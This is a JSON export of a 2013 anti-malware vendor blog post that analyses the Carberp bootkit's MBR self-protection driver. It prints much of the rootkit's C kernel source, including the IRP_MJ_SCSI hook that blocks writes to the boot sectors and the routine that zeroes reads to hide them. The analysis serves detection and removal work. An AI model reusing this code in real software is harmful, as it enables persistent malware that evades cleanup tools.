{"id":54,"date":"2013-07-04T11:20:41","date_gmt":"2013-07-04T11:20:41","guid":{"rendered":"http:\/\/www.adlice.com\/?p=54"},"modified":"2022-12-21T10:42:20","modified_gmt":"2022-12-21T10:42:20","slug":"carberp-bootkit-how-self-protection-is-effective","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/es\/carberp-bootkit-how-self-protection-is-effective\/","title":{"rendered":"Carberp bootkit : How self-protection is effective"},"content":{"rendered":"\n

Introduction<\/h4>\n\n\n\n

Carberp has bootkit features<\/strong> (for boot rootkit), allowing it to survive reboots by loading it’s driver from the MBR<\/strong> (Master boot record) bootstrap. The MBR Payload installer is basically just a low level (and not that low, AVs should be able to intercept it easily…) rewrite of the MBR sector with a custom self decrypted 16 bits code able to load its module in memory at boot time. Classic.<\/p>\n\n\n\n

What we’ll see here is the driver itself, and especially the filter part, which is intended to protect the MBR sector against rewriting from malware removal tools<\/strong> (as it’s his only way to survive reboot, if one is able to overwrite the MBR with a legit one, the whole infection is gone).<\/p>\n\n\n\n

It basically uses IRP inline hook on IRP_MJ_INTERNAL_DEVICE_CONTROL<\/strong> (or IRP_MJ_SCSI), to detour the execution flow of low level disk read\/write and filter the calls<\/strong>.<\/p>\n\n\n\n


Analysis<\/h4>\n\n\n\n

Here’s the global flow of the source code:
 
\"bootkit-923x1024\"<\/a><\/p>\n\n\n\n

The driver entry is called very early in the system boot, due to the MBR loader (which will load the driver in memory before the system starts<\/strong>, no filesystem, no interrupts, and overall no antivirus). So it will trigger Initialization of the bootkit, which will registers its Process and Image callbacks (to be notified of new processes, and new drivers loaded, and inject them with APC – Not covered here).<\/p>\n\n\n\n

\/\/\n\/\/ Our driver entry\n\/\/\nNTSTATUS DriverEntry(IN PDRIVER_OBJECT  DriverObject, IN PUNICODE_STRING RegistryPath)\n{\n\tNTSTATUS ntStatus = BkInitialize(DriverObject, RegistryPath, &amp;DriverInitialize, &amp;DriverStartup);\n\treturn(ntStatus);\n}<\/code><\/pre>\n\n\n\n
NTSTATUS DriverStartup(IN PDRIVER_OBJECT  DriverObject, IN PUNICODE_STRING RegistryPath)\n{\n\tNTSTATUS ntStatus = STATUS_SUCCESS;\n\tBkInitDriverDispatch(DriverObject);\n\n\tntStatus = HandleAllocateTable(&amp;g_ActiveProcessDb, sizeof(PID_CONTEXT), NULL, NULL);\n\tif (NT_SUCCESS(ntStatus))\n\t{\n\t\tInitializeAddons();\n\n\t\tntStatus = PsSetCreateProcessNotifyRoutine(&amp;MyCreateProcessNotifyRoutine, FALSE);\n\t\tif (NT_SUCCESS(ntStatus))\n\t\t{\n\t\t\tntStatus = PsSetLoadImageNotifyRoutine(&amp;MyLoadImageNotifyRoutine);\n#ifdef _DRIVER_SUPPORTS_UNLOAD\n\t\t\tDriverObject-&gt;DriverUnload = &amp;DriverUnload;\n#endif\n\t\t}\n\n\t\tif (!NT_SUCCESS(ntStatus))\n\t\t{\n\t\t\tPsSetCreateProcessNotifyRoutine(&amp;MyCreateProcessNotifyRoutine, TRUE);\n\t\t\tHandleReleaseTable(g_ActiveProcessDb);\n\t\t}\n\t\telse\n\t\t{\n#ifdef\t_BK_KIP\n\t\t\tntStatus = KipStartup(DriverObject, RegistryPath);\n#endif\n#ifdef\t_BK_VFS\n\t\t\tntStatus = FsLibStartup(DriverObject, RegistryPath);\n#endif\n\n\t\t\tif(NT_SUCCESS(ntStatus))\n\t\t\t\tStartDelayInitThread();\n\t\t}\n\n\t}\t\/\/ if (NT_SUCCESS(ntStatus))\n\n\treturn(ntStatus);\n}<\/code><\/pre>\n\n\n\n
StartDelayInitThread is responsible for creating a system thread which will wait for the filesystem to be available<\/strong> (just polling on a basic directory handle query until it succeed) and then it knows it can start the filesystem filtering<\/strong>.<\/p>\n\n\n\n
\/\/\n\/\/ Create FS wait thread.\n\/\/\nNTSTATUS StartDelayInitThread(VOID)\n{\n\tHANDLE\t\thThread;\n\tNTSTATUS\tntStatus;\n\tOBJECT_ATTRIBUTES\toa = {0};\n\n\tInitializeObjectAttributes(&amp;oa, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);\n\tntStatus = PsCreateSystemThread(&amp;hThread, GENERIC_ALL, &amp;oa, NULL, NULL, &amp;DelayInitThread, NULL);\n\tif (NT_SUCCESS(ntStatus))\n\t\tZwClose(hThread);\n\treturn(ntStatus);\n}<\/code><\/pre>\n\n\n\n
\/\/\n\/\/\tSince our driver coud be started early at system startup, there could be neither disk device no file system yet.\n\/\/\tThis function waits until file system initialized and then activates KREP if any.\n\/\/\nVOID DelayInitThread(PVOID Context)\n{\n\tNTSTATUS\tntStatus;\n\tUNICODE_STRING\tuDirectory = RTL_CONSTANT_STRING(wczSystemRoot);\n\tIO_STATUS_BLOCK\tIoStatus = {0};\n\tOBJECT_ATTRIBUTES\toa = {0};\n\tLARGE_INTEGER\t\tInterval;\n\tHANDLE\t\t\t\thDir;\n\tBK_FS_AREA\t\t\tFsArea;\n\n\tInterval.QuadPart = _RELATIVE(_MILLISECONDS(100));\n\n\tInitializeObjectAttributes(&amp;oa, &amp;g_FsVolumeDevice, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);\n\t\/\/ Trying to open FS disk device.\n\tdo \n\t{\t\t\n\t\tntStatus = ZwOpenFile(&amp;hDir, GENERIC_READ | SYNCHRONIZE, &amp;oa, &amp;IoStatus, \n\t\t\tFILE_SHARE_READ | FILE_SHARE_WRITE, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);\n\n\t\tif (NT_SUCCESS(ntStatus))\n\t\t\tbreak;\n\n\t\tKeDelayExecutionThread(KernelMode, TRUE, &amp;Interval);\n\t} while(!NT_SUCCESS(ntStatus));\n\n\tZwClose(hDir);\n\n#if (defined(_BK_VFS) || defined(_BK_FILTER))\n\t\/\/ Obtaining FS area information, coz we need it for VFS and for the Filter too.\n\tntStatus = FsLibGetFsArea(&amp;FsArea);\n#endif\n#ifdef\t_BK_FILTER\n\tif (NT_SUCCESS(ntStatus))\n\t\tntStatus = FltStartup(&amp;FsArea);\n#endif\n#ifdef\t_BK_VFS\n\tif (NT_SUCCESS(ntStatus))\n\t\tntStatus = FsLibActivate(&amp;FsArea);\n\t\/\/ Loading and processing an inject configuration file if any\n\tif (NT_SUCCESS(ntStatus))\n\t\tKldrLoadInjectConfig();\n#endif\n#ifdef\t_BK_KBOT\n\tif (NT_SUCCESS(ntStatus))\n\t\tntStatus = KBotStartup();\n#endif\n\n\tUNREFERENCED_PARAMETER(Context);\n}<\/code><\/pre>\n\n\n\n
FltStartup is triggered once the system has completely booted, and the filesystem is available. It will “attach”<\/strong> (not in the term of Device model, but malware writers model :D) to the upper device of PhysicalDrive0<\/strong>, by searching it’s device pointer, then Splicing its IRP_MJ_SCSI major function<\/strong> (looking for a JMP in the bytecode and replacing the address with its own). That way, on each attempt to read\/write on PhysicalDrive0 it will end in the detour function (ClassDispatchScsi).
<\/strong><\/p>\n\n\n\n
I’ve simulated the call to get the lower device of PhysicalDrive0, screenshot below:
 
\"2013-07-04-14_02_27-DeviceTree-V2.30-Driver-View-OSRs-Device-and-Driver-Explorer-1024x320\"<\/a><\/p>\n\n\n\n
#define wczBootDevice L\"\\\\Device\\\\Harddisk0\\\\DR0\"\nNTSTATUS\tFltStartup(IN PBK_FS_AREA FsArea)\n{\n\tNTSTATUS\tntStatus = STATUS_INSUFFICIENT_RESOURCES;\n\tUNICODE_STRING\tuDeviceName = RTL_CONSTANT_STRING(wczBootDevice);\n\n\tKdPrint((\"BKFLT: BK filter driver started.\\n\"));\n\n\tHookInit();\n\n\tRtlMoveMemory(&amp;g_FsArea, FsArea, sizeof(BK_FS_AREA));\n\n\tntStatus = FltAttachClassDeviceDriver(&amp;uDeviceName);\n\n\tKdPrint((\"BKFLT: Driver entry finished with status %x\\n\", ntStatus));\n\n\treturn(ntStatus);\n}<\/code><\/pre>\n\n\n\n
NTSTATUS\tFltAttachClassDeviceDriver(PUNICODE_STRING uDeviceName)\n{\n\tNTSTATUS\t\tntStatus;\n\tPDRIVER_OBJECT\tDriverObj;\n\tLARGE_INTEGER\tTickCount;\n\n\tif (NT_SUCCESS(ntStatus = GetLowerDeviceObjectByName(uDeviceName, &amp;g_ClassDevice)))\n\t{\n\t\tDriverObj = g_ClassDevice-&gt;DriverObject;\n\n\t\t\/\/ Initializing BK internal request mark value\n\t\tKeQueryTickCount(&amp;TickCount);\n\t\tg_MySrbMark = TickCount.LowPart;\n\n\t\t\/\/ Setting hooks\n\t\tif (DriverObj-&gt;MajorFunction[IRP_MJ_SCSI])\n\t\t\tSetHook(&amp;ClassDispatchScsi, &amp;DriverObj-&gt;MajorFunction[IRP_MJ_SCSI], DriverObj-&gt;DriverStart);\n\t} \n\n\treturn(ntStatus);\n}<\/code><\/pre>\n\n\n\n
my_DispatchScsi is the detour function for IRP_MJ_SCSI. Once we got a request for read\/write of PhysicalDrive0<\/strong>, the SRB (object containing all information about the request) is parsed.<\/p>\n\n\n\n
If the request is a WRITE request and the offset and size requested and overlapping the boot sector<\/strong> (the one which is protected by the rootkit), then the rootkit will return ERROR_ACCESS_DENIED<\/strong> and the request will fail. Thus, the MBR is overwrite protected<\/strong>.<\/p>\n\n\n\n
If the request is a READ request and is overlapping the boot sector<\/strong>, the IRP will be tagged with a completion routine for later processing<\/strong>, and it will pass the IRP to the next device of the stack.<\/p>\n\n\n\n
\/\/\n\/\/\tStandard IRP_MJ_SCSI dispatch routine hook\n\/\/\nNTSTATUS my_DispatchScsi(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)\n{\n\tNTSTATUS\tntStatus = STATUS_REQUEST_NOT_ACCEPTED;\n\tULONGLONG\tStartBlock;\n\tULONG\tNumberBlocks, Length;\n\tUCHAR\tCdbOpCode;\n\tPCHAR\tDataBuffer;\n\n\tENTER_HOOK();\n\n\tif (DeviceObject == g_ClassDevice)\n\t{\n\t\t\/\/DbgPrintSrb(Srb);\n\n\t\tCdbOpCode = FltParseSrb(Irp, &amp;StartBlock, &amp;NumberBlocks, &amp;DataBuffer, &amp;Length);\n\n\t\tif (CdbOpCode == SCSIOP_WRITE || CdbOpCode == SCSIOP_WRITE_DATA_BUFF)\n\t\t{\n\t\t\tif (FltIsWithinBkArea(StartBlock, NumberBlocks))\n\t\t\t{\n\t\t\t\tntStatus = STATUS_ACCESS_DENIED;\n\t\t\t\tIrp-&gt;IoStatus.Status = ntStatus;\n\t\t\t\tIoCompleteRequest(Irp, IO_NO_INCREMENT);\n\t\t\t\tKdPrint((\"BKFLT: Write from %u for %u sectors - blocked.\\n\", (ULONG)StartBlock, NumberBlocks));\n\t\t\t}\n\t\t}\t\/\/ if (CdbOpCode == SCSIOP_WRITE || CdbOpCode == SCSIOP_WRITE_DATA_BUFF)\n\t\telse if (CdbOpCode == SCSIOP_READ || CdbOpCode == SCSIOP_READ_DATA_BUFF)\n\t\t{\n\t\t\tif (FltIsWithinBkArea(StartBlock, NumberBlocks))\n\t\t\t\tntStatus = FltForwardScsiIrpAsync(DeviceObject, Irp, StartBlock, NumberBlocks, DataBuffer, Length);\n\n\t\t}\t\/\/ else if (CdbOpCode == SCSIOP_READ || CdbOpCode == SCSIOP_READ_DATA_BUFF)\n\t}\t\/\/ if (DeviceObject == g_ClassDevice)\n\n\tif (ntStatus == STATUS_REQUEST_NOT_ACCEPTED)\n\t\tntStatus = ((PDRIVER_DISPATCH)hook_DispatchScsi.Original)(DeviceObject, Irp);\n\n\tLEAVE_HOOK();\n\n\treturn(ntStatus);\n}\t\/\/ my_DispatchScsi\n<\/code><\/pre>\n\n\n\n
NTSTATUS FltForwardScsiIrpAsync(IN PDEVICE_OBJECT DeviceObject, IN PIRP\tIrp, IN ULONGLONG StartBlock, \n    ULONG NumberBlocks, PCHAR DataBuffer, ULONG Length)\n{\n\tNTSTATUS\tntStatus = STATUS_INSUFFICIENT_RESOURCES;\n\tPFLT_COMPLETION_CONTEXT\tFltCtx;\n\tPIO_STACK_LOCATION\t\tIrpStack = IoGetCurrentIrpStackLocation(Irp);\n\n\tif (FltCtx = MyAllocatePool(NonPagedPool, sizeof(FLT_COMPLETION_CONTEXT)))\n\t{\n\t\tFltCtx-&gt;StartBlock = StartBlock;\n\t\tFltCtx-&gt;NumberBlocks = NumberBlocks;\n\t\tFltCtx-&gt;DataBuffer = DataBuffer;\n\t\tFltCtx-&gt;Length\t= Length;\n\n\t\t\/\/ save previouse completion routine, context and control flags\n\t\tFltCtx-&gt;CompletionRoutine = IrpStack-&gt;CompletionRoutine;\n\t\tFltCtx-&gt;CompletionContext = IrpStack-&gt;Context;\n\t\tFltCtx-&gt;Control = IrpStack-&gt;Control;\n\n\t\t\/\/ set a completion routine, context and control flags\n\t\tIrpStack-&gt;CompletionRoutine = &amp;FltIrpCompletionRoutine;\n\t\tIrpStack-&gt;Context = FltCtx;\n\t\tIrpStack-&gt;Control = SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR;\n\n\t\t\/\/ call the next lower device\n\t\tntStatus = ((PDRIVER_DISPATCH)hook_DispatchScsi.Original)(DeviceObject, Irp);\n\t}\n    return(ntStatus);\n\n}\t\/\/ FltProcessScsiIrpSynchronous<\/code><\/pre>\n\n\n\n
Once the READ completed, we end into the completion routine<\/strong> (FltIrpCompletionRoutine), which will trigger FltReplaceRead. This function will simply zero the bytes overlapping the boot sector<\/strong>. That way, one will think the requested (and protected) sectors are empty, and will not be able to know what to do with (and thus will not be able to match against malicious signatures)<\/strong>. The MBR is hidden from read requests.<\/p>\n\n\n\n
NTSTATUS FltIrpCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)\n{\n\tNTSTATUS\tntStatus1, ntStatus = STATUS_MORE_PROCESSING_REQUIRED;\n\tPFLT_COMPLETION_CONTEXT FltCtx = (PFLT_COMPLETION_CONTEXT)Context;\n\tPIO_STACK_LOCATION\t\tIrpStack = IoGetCurrentIrpStackLocation(Irp);\n\n\t\/\/ restore saved completion routine, context and control flags\n\tIrpStack-&gt;CompletionRoutine = FltCtx-&gt;CompletionRoutine;\n\tIrpStack-&gt;Context = FltCtx-&gt;CompletionContext;\n\tIrpStack-&gt;Control = FltCtx-&gt;Control;\n\n\tntStatus1 = Irp-&gt;IoStatus.Status;\n\n\tif (NT_SUCCESS(ntStatus1))\n\t{\n\t\tPCHAR UserBuffer = MmGetSystemAddressForMdlSafe(Irp-&gt;MdlAddress, LowPagePriority);\n\t\tFltReplaceRead(FltCtx-&gt;StartBlock, FltCtx-&gt;NumberBlocks, UserBuffer, FltCtx-&gt;Length);\n\t}\t\t\n\n\tif (IrpStack-&gt;CompletionRoutine)\n\t{\n\t\tif ((NT_SUCCESS(ntStatus1) &amp;&amp; (IrpStack-&gt;Control | SL_INVOKE_ON_SUCCESS)) ||\n\t\t\t(ntStatus1 == STATUS_CANCELLED &amp;&amp; (IrpStack-&gt;Control | SL_INVOKE_ON_CANCEL)) ||\n\t\t\t(!NT_SUCCESS(ntStatus1) &amp;&amp; ntStatus1 != STATUS_CANCELLED &amp;&amp; (IrpStack-&gt;Control | SL_INVOKE_ON_ERROR))\n\t\t\t)\n\t\t{\n\t\t\t\/\/ Calling original IO completion routine\n\t\t\tntStatus = (IrpStack-&gt;CompletionRoutine)(DeviceObject, Irp, IrpStack-&gt;Context);\n\t\t}\n\t}\t\/\/ if (IrpStack-&gt;CompletionRoutine)\n\n\tMyFreePool(FltCtx);\n\n    return(ntStatus);\n}<\/code><\/pre>\n\n\n\n
VOID FltReplaceRead(ULONGLONG StartBlock, ULONG NumberBlocks, PCHAR DataBuffer, ULONG Length)\n{\n\tULONG\tSkipped;\n\tPCHAR\tFillBuffer;\n\tULONG\tFillLength = 0;\n\n\tif ((StartBlock + NumberBlocks) &gt; g_FsArea.StartSector &amp;&amp; StartBlock &lt; (g_FsArea.StartSector + g_FsArea.NumberOfSectors))\n\t{\n\t\tFillBuffer = DataBuffer;\n\t\tFillLength = Length;\n\n\t\tif (StartBlock &lt; g_FsArea.StartSector) \t\t{ \t\t\tSkipped = ((ULONG)(g_FsArea.StartSector - StartBlock)) * g_FsArea.BytesPerSector; \t\t\tASSERT(FillLength &gt; Skipped);\n\t\t\tFillBuffer += Skipped;\n\t\t\tFillLength -= Skipped;\n\t\t}\n\n\t\tif ((StartBlock + NumberBlocks) &gt; (g_FsArea.StartSector + g_FsArea.NumberOfSectors))\n\t\t{\n\t\t\tSkipped = (ULONG)((StartBlock + NumberBlocks) - (g_FsArea.StartSector + g_FsArea.NumberOfSectors));\n\t\t\tSkipped *= g_FsArea.BytesPerSector;\n\t\t\tASSERT(FillLength &gt; Skipped);\n\t\t\tFillLength -= Skipped;f\n\t\t}\n\n\t\tif (FillLength)\n\t\t{\n\t\t\tRtlZeroMemory(FillBuffer, FillLength);\n\t\t\tKdPrint((\"BKFLT: Replace %u bytes read starting from sector %u.\\n\", FillLength, (ULONG)StartBlock + (ULONG)(FillBuffer - DataBuffer) \/ g_FsArea.BytesPerSector));\n\t\t}\n\t}\n\n\tif (((StartBlock + NumberBlocks) &gt; g_FsArea.BootSector &amp;&amp; StartBlock &lt; (g_FsArea.BootSector + 16)))\n\t{\n\t\tFillBuffer = DataBuffer;\n\t\tFillLength = Length;\n\n\t\tif (StartBlock &lt; g_FsArea.BootSector) \t\t{ \t\t\tSkipped = ((ULONG)(g_FsArea.BootSector - StartBlock)) *  g_FsArea.BytesPerSector; \t\t\tASSERT(FillLength &gt; Skipped);\n\t\t\tFillBuffer += Skipped;\n\t\t\tFillLength -= Skipped;\n\t\t}\n\n\t\tif ((StartBlock + NumberBlocks) &gt; (g_FsArea.BootSector + 16))\n\t\t{\n\t\t\tSkipped = (ULONG)((StartBlock + NumberBlocks) - (g_FsArea.BootSector + 16));\n\t\t\tSkipped *= g_FsArea.BytesPerSector;\n\t\t\tASSERT(FillLength &gt; Skipped);\n\t\t\tFillLength -= Skipped;\n\t\t}\n\n\t\tKdPrint((\"BKFLT: Replace %u bytes read starting from sector %u.\\n\", FillLength, (ULONG)StartBlock + (ULONG)(FillBuffer - DataBuffer) \/ g_FsArea.BytesPerSector));\n\t}\t\/\/ if ((StartBlock + NumberBlocks) &gt; g_FsArea.StartSector &amp;&amp; StartBlock &lt; (g_FsArea.StartSector + g_FsArea.NumberOfSectors))\t\t\n}<\/code><\/pre>\n\n\n\n

Conclusion<\/h4>\n\n\n\n
The filter part of the Carberp bootkit is only one module among many others<\/strong>. It’s only designed to protect the only entry point of the whole infection, MBR<\/strong>. That way, without a (very) low level driver able to bypass its notification routine and the IRP hook to grab the correct bytes for analysis and cleanup, the removal tool will not be able to remove that nasty bootkit.<\/p>\n","protected":false},"excerpt":{"rendered":"
Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.<\/p>\n","protected":false},"author":1,"featured_media":57,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36],"tags":[7,44,42,43],"class_list":["post-54","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","tag-analysis","tag-bootkit","tag-carberp","tag-rootkit","category-36","description-off"],"views":1262,"yoast_score":65,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/es\/author\/tigzy\/"},"yoast_head":"\nCarberp bootkit Self Protection | Analysis \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Carberp bootkit Self Protection | Analysis \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2013-07-04T11:20:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:42:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png\" \/>\n\t<meta property=\"og:image:width\" content=\"845\" \/>\n\t<meta property=\"og:image:height\" content=\"534\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Carberp bootkit : How self-protection is effective\",\"datePublished\":\"2013-07-04T11:20:41+00:00\",\"dateModified\":\"2022-12-21T10:42:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\"},\"wordCount\":626,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png\",\"keywords\":[\"analysis\",\"bootkit\",\"carberp\",\"rootkit\"],\"articleSection\":[\"Analysis\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\",\"url\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\",\"name\":\"Carberp bootkit Self Protection | Analysis \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png\",\"datePublished\":\"2013-07-04T11:20:41+00:00\",\"dateModified\":\"2022-12-21T10:42:20+00:00\",\"description\":\"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png\",\"width\":845,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Carberp bootkit : How self-protection is effective\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/es\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Carberp bootkit Self Protection | Analysis \u2022 Adlice Software","description":"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/","og_locale":"es_ES","og_type":"article","og_title":"Carberp bootkit Self Protection | Analysis \u2022 Adlice Software","og_description":"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.","og_url":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2013-07-04T11:20:41+00:00","article_modified_time":"2022-12-21T10:42:20+00:00","og_image":[{"width":845,"height":534,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"Escrito por":"tigzy","Tiempo de lectura":"7 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Carberp bootkit : How self-protection is 